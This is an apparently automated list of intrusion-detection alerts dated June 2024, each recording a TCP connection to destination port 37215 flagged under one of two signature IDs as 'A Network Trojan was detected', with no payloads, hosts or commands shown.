                Timestamp:06/14/24-10:44:04.425101
                SID:2835222
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226614
                SID:2829579
                Source Port:40598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180332
                SID:2835222
                Source Port:57216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084253
                SID:2835222
                Source Port:40298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470084
                SID:2829579
                Source Port:44352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725233
                SID:2829579
                Source Port:50782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033323
                SID:2829579
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147148
                SID:2829579
                Source Port:44052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998451
                SID:2829579
                Source Port:57702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805354
                SID:2829579
                Source Port:45522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025856
                SID:2829579
                Source Port:41128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326591
                SID:2835222
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074158
                SID:2829579
                Source Port:43358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014016
                SID:2835222
                Source Port:59502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322160
                SID:2829579
                Source Port:46282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663182
                SID:2829579
                Source Port:35026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410938
                SID:2835222
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452189
                SID:2835222
                Source Port:37500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027342
                SID:2829579
                Source Port:35204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161440
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547420
                SID:2835222
                Source Port:54156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185986
                SID:2829579
                Source Port:48854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644179
                SID:2835222
                Source Port:38196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940885
                SID:2835222
                Source Port:43454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177374
                SID:2829579
                Source Port:42654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990751
                SID:2835222
                Source Port:56846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685361
                SID:2829579
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054440
                SID:2829579
                Source Port:42670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366246
                SID:2829579
                Source Port:57656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010582
                SID:2835222
                Source Port:46672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546580
                SID:2829579
                Source Port:50870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072337
                SID:2835222
                Source Port:35210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182154
                SID:2835222
                Source Port:41686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827874
                SID:2835222
                Source Port:35048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997293
                SID:2829579
                Source Port:47428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410477
                SID:2829579
                Source Port:42654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019107
                SID:2835222
                Source Port:55444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089840
                SID:2835222
                Source Port:34752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684091
                SID:2829579
                Source Port:33472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662002
                SID:2829579
                Source Port:35740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200268
                SID:2835222
                Source Port:36024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878094
                SID:2835222
                Source Port:49084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424367
                SID:2829579
                Source Port:59286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776647
                SID:2829579
                Source Port:52436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568597
                SID:2835222
                Source Port:59982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366412
                SID:2829579
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200225
                SID:2835222
                Source Port:39256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846468
                SID:2835222
                Source Port:40600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326679
                SID:2829579
                Source Port:42742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448812
                SID:2829579
                Source Port:56694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177969
                SID:2835222
                Source Port:52002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114877
                SID:2835222
                Source Port:53682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406275
                SID:2829579
                Source Port:49246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899047
                SID:2835222
                Source Port:47896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024975
                SID:2829579
                Source Port:33190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517901
                SID:2829579
                Source Port:33274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701852
                SID:2835222
                Source Port:55130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411782
                SID:2829579
                Source Port:39538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291028
                SID:2835222
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714880
                SID:2835222
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766695
                SID:2829579
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052671
                SID:2829579
                Source Port:40446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367176
                SID:2835222
                Source Port:54090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662732
                SID:2829579
                Source Port:47384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201680
                SID:2829579
                Source Port:57432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646257
                SID:2829579
                Source Port:44372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275904
                SID:2835222
                Source Port:35960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071972
                SID:2835222
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339842
                SID:2835222
                Source Port:60696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149212
                SID:2829579
                Source Port:50762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968764
                SID:2835222
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967951
                SID:2829579
                Source Port:60828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879544
                SID:2829579
                Source Port:52172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947363
                SID:2835222
                Source Port:34106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671837
                SID:2835222
                Source Port:32950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640827
                SID:2835222
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641077
                SID:2829579
                Source Port:54686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849456
                SID:2835222
                Source Port:60370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915917
                SID:2829579
                Source Port:38532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152087
                SID:2835222
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671873
                SID:2835222
                Source Port:39140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011703
                SID:2829579
                Source Port:44862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724899
                SID:2829579
                Source Port:37762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699691
                SID:2829579
                Source Port:33040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704286
                SID:2829579
                Source Port:34644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829316
                SID:2835222
                Source Port:32878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131515
                SID:2835222
                Source Port:38192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291338
                SID:2835222
                Source Port:39354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368548
                SID:2829579
                Source Port:35082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164789
                SID:2835222
                Source Port:36076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614424
                SID:2835222
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.673035
                SID:2835222
                Source Port:48622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726522
                SID:2829579
                Source Port:57410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277757
                SID:2835222
                Source Port:47872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178404
                SID:2835222
                Source Port:35376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775376
                SID:2835222
                Source Port:43214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789157
                SID:2835222
                Source Port:59432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033956
                SID:2829579
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002019
                SID:2835222
                Source Port:46268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229019
                SID:2835222
                Source Port:53172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148997
                SID:2835222
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542779
                SID:2829579
                Source Port:55780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001612
                SID:2829579
                Source Port:59336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342616
                SID:2829579
                Source Port:39608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229183
                SID:2829579
                Source Port:56916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778156
                SID:2829579
                Source Port:44570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519405
                SID:2835222
                Source Port:58322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291828
                SID:2835222
                Source Port:40620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050829
                SID:2835222
                Source Port:44748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733432
                SID:2835222
                Source Port:60726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967569
                SID:2829579
                Source Port:34010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293373
                SID:2829579
                Source Port:53872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985070
                SID:2835222
                Source Port:55222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850043
                SID:2835222
                Source Port:48538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978493
                SID:2829579
                Source Port:53270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566502
                SID:2835222
                Source Port:56306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762013
                SID:2829579
                Source Port:55928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809498
                SID:2829579
                Source Port:41426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759803
                SID:2835222
                Source Port:51128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806607
                SID:2829579
                Source Port:51054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965518
                SID:2835222
                Source Port:52550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424841
                SID:2829579
                Source Port:57218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859190
                SID:2835222
                Source Port:36742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811104
                SID:2835222
                Source Port:35508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947165
                SID:2835222
                Source Port:48836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858128
                SID:2835222
                Source Port:48658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291618
                SID:2829579
                Source Port:45248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547241
                SID:2829579
                Source Port:55360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336943
                SID:2829579
                Source Port:43040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967641
                SID:2835222
                Source Port:33090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228610
                SID:2835222
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940957
                SID:2835222
                Source Port:59372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677590
                SID:2835222
                Source Port:56988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276029
                SID:2835222
                Source Port:45822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517576
                SID:2829579
                Source Port:38614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.582210
                SID:2829579
                Source Port:47770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778292
                SID:2835222
                Source Port:40486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805504
                SID:2835222
                Source Port:59558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343996
                SID:2829579
                Source Port:52696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011124
                SID:2835222
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020770
                SID:2835222
                Source Port:43624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761369
                SID:2829579
                Source Port:44692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764102
                SID:2835222
                Source Port:36964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568180
                SID:2835222
                Source Port:42962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968301
                SID:2835222
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149964
                SID:2835222
                Source Port:54770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410089
                SID:2829579
                Source Port:41244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273070
                SID:2835222
                Source Port:33498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879574
                SID:2835222
                Source Port:34714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409069
                SID:2829579
                Source Port:41460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967063
                SID:2829579
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718834
                SID:2829579
                Source Port:51310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812449
                SID:2835222
                Source Port:50158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668697
                SID:2835222
                Source Port:49370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943628
                SID:2829579
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073908
                SID:2835222
                Source Port:50790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944169
                SID:2829579
                Source Port:50476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679124
                SID:2829579
                Source Port:59312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517182
                SID:2829579
                Source Port:36150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275303
                SID:2835222
                Source Port:47242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200463
                SID:2829579
                Source Port:54464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323225
                SID:2829579
                Source Port:39142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549015
                SID:2835222
                Source Port:59898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913217
                SID:2835222
                Source Port:56564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273583
                SID:2829579
                Source Port:36752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502183
                SID:2835222
                Source Port:55316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972128
                SID:2835222
                Source Port:43592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941406
                SID:2829579
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772517
                SID:2835222
                Source Port:44374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367271
                SID:2835222
                Source Port:53902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543899
                SID:2829579
                Source Port:57372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734265
                SID:2835222
                Source Port:33930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660871
                SID:2835222
                Source Port:56634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339346
                SID:2829579
                Source Port:55618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735650
                SID:2829579
                Source Port:55444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789360
                SID:2829579
                Source Port:43296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581790
                SID:2835222
                Source Port:55048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546104
                SID:2829579
                Source Port:44132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135224
                SID:2835222
                Source Port:45480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505106
                SID:2829579
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662565
                SID:2835222
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878936
                SID:2835222
                Source Port:32826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625336
                SID:2835222
                Source Port:59924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702359
                SID:2829579
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762942
                SID:2829579
                Source Port:40648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160806
                SID:2829579
                Source Port:44364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519213
                SID:2829579
                Source Port:34344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792192
                SID:2835222
                Source Port:42448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879394
                SID:2835222
                Source Port:55190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115119
                SID:2835222
                Source Port:46858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666134
                SID:2829579
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968150
                SID:2835222
                Source Port:54352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.642624
                SID:2835222
                Source Port:49346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906000
                SID:2829579
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906105
                SID:2835222
                Source Port:46156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640669
                SID:2835222
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760119
                SID:2835222
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943292
